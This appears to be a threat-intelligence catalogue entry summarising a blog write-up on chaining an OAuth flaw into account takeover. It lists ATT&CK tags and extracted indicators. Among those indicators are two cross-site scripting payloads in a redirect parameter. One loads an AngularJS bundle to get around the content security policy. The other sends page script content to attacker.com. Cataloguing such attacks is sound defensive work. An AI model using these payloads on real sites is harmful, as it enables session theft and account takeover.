Exploiting OAuth: Journey to Account Takeover
Tags
attack-pattern: Data Domains - T1583.001 Domains - T1584.001 Email Addresses - T1589.002 Javascript - T1059.007 Server - T1583.004 Server - T1584.004 Vulnerabilities - T1588.006
Show in Graph
Common Information
Type Value
UUID 1dab4db7-0733-4870-924a-fd328e010123
Fingerprint a60985882d337da4
Analysis status DONE
Considered CTI value 0
Text language
Published Nov. 19, 2021, midnight
Added to db Jan. 18, 2023, 8:26 p.m.
Last updated Nov. 2, 2024, 10 a.m.
Headline
Title Exploiting OAuth: Journey to Account Takeover
Detected Hints/Tags/Attributes 37/1/14
Source URLs
Redirection Url
Details Source https://blog.dixitaditya.com/2021/11/19/account-takeover-chain.html
URL Provider
Details Provider Source level domain
Details dixitaditya.com blog.dixitaditya.com
Attributes
Details Type #Events CTI Value
Details Domain 22 
victim.com
Details Domain 1 
app.victim.com
Details Domain 16 
www.gstatic.com
Details Domain 1 
content-security-policy.com
Details File 1 
_js-bundle1.js
Details Url 1 
https://victim.com
Details Url 1 
https://login.microsoftonline.com/<tenant-name>.onmicrosoft.com/oauth2/v2.0/authorize?p=
Details Url 1 
https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard
Details Url 1 
https://app.victim.com/auth/return
Details Url 1 
https://app.victim.com/dashboard
Details Url 4 
https://www.gstatic.com
Details Url 1 
https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard\</script\>\<script+src="https://www.gstatic.com/fsn/angular\_js-bundle1.js"\>\</script\>\<input+ng-app+autofocus+ng-focus%3d"$event.path|orderby:'[].constructor.from
Details Url 1 
https://content-security-policy.com/connect-src
Details Url 1 
https://app.victim.com/login?redirecturl=https://app.victim.com/dashboard</script><script>window.location='http://attacker.com/'+document.getelementsbytagname('script')[0].outertext